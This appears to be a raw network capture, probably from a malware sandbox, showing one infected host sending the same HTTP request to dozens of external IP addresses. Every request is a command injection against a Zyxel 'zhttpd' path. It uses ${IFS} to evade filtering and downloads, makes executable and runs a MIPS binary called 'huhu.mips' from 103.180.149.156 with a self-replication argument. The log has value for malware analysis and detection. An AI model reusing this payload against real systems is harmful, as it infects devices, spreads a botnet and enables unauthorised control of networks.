                                                        Feb 2, 2024 06:21:06.874202967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3602192.168.2.1457110109.198.251.201443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.874254942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3603192.168.2.1449760107.25.78.29443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.874315023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3604192.168.2.1459196160.236.128.75443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.874345064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3605192.168.2.144523412.226.226.179443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.874368906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3606192.168.2.1457582195.168.251.134443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.874388933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3607192.168.2.1448682155.35.48.200443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.874439955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3608192.168.2.144036064.100.163.70443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.874480963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3609192.168.2.1458298195.102.46.182443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.874511957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3610192.168.2.145786458.131.13.31443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.874547958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3611192.168.2.145378820.227.202.216443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.874588013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3612192.168.2.1434734155.223.86.200443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.874617100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3613192.168.2.145650483.62.239.99443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.874660969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3614192.168.2.1443598107.181.86.105443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.874697924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3615192.168.2.146090674.140.92.78443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.874753952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3616192.168.2.1449654211.236.180.174443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.874789953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3617192.168.2.1440736193.55.253.113443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.874839067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3618192.168.2.1455308104.95.167.203443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.874882936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3619192.168.2.145200457.239.222.16443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.874918938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3620192.168.2.1436106164.101.0.239443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.874949932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3621192.168.2.143497678.137.26.100443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.874993086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3622192.168.2.145902818.179.105.210443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.875035048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3623192.168.2.1434596189.158.165.120443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.875056028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3624192.168.2.146045046.11.216.132443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.875099897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3625192.168.2.1454984121.128.203.170443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.875128984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3626192.168.2.145567284.45.67.172443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.875166893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3627192.168.2.145539237.16.201.105443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.875206947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3628192.168.2.143388466.11.32.50443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.875246048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3629192.168.2.1438980148.118.224.208443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.875282049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3630192.168.2.1458310113.141.46.117443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.875328064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3631192.168.2.1438114185.189.185.95443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.875355005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3632192.168.2.1437122175.199.161.141443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.875411034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3633192.168.2.1460864190.178.202.0443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.875430107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3634192.168.2.1438034213.110.110.204443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.875477076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3635192.168.2.1439860107.45.36.253443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.875513077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3636192.168.2.1433004126.97.164.234443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.875560999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3637192.168.2.1441566208.170.133.124443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.875614882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3638192.168.2.1458946212.52.104.151443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.875654936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3639192.168.2.1446682161.102.226.92443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.875684023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3640192.168.2.143343620.47.231.26443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.875725985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3641192.168.2.144948090.95.192.55443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.875756979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3642192.168.2.1433152162.35.58.115443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.875792980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3643192.168.2.144711477.205.176.96443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.875842094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3644192.168.2.144618218.135.150.152443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.875894070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3645192.168.2.1437004173.60.101.148443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.875921011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3646192.168.2.1459134104.37.228.21443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.875957012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3647192.168.2.1456164220.82.107.113443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.875986099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3648192.168.2.1443388150.191.224.139443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.876018047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3649192.168.2.1443096125.51.134.148443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.876044989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3650192.168.2.1439918221.212.252.1443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.876077890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3651192.168.2.1452354173.244.128.138443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.876101971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3652192.168.2.1455294199.75.118.167443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.876159906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3653192.168.2.144372038.218.187.92443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.876202106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3654192.168.2.1453272149.108.12.6443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.876239061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3655192.168.2.143741469.226.59.153443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.876288891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3656192.168.2.1449206171.218.90.85443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.876315117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3657192.168.2.144502658.87.86.218443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.876348972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3658192.168.2.1443208162.253.3.189443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.876388073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3659192.168.2.1443292168.35.90.132443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.876420021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3660192.168.2.1446602158.48.30.215443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.876462936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3661192.168.2.1451674154.81.159.52443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.876514912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3662192.168.2.1454862209.75.126.246443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.876547098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3663192.168.2.1433238154.231.239.50443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.876591921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3664192.168.2.1438510167.49.149.246443
                                                        TimestampBytes transferredDirectionData
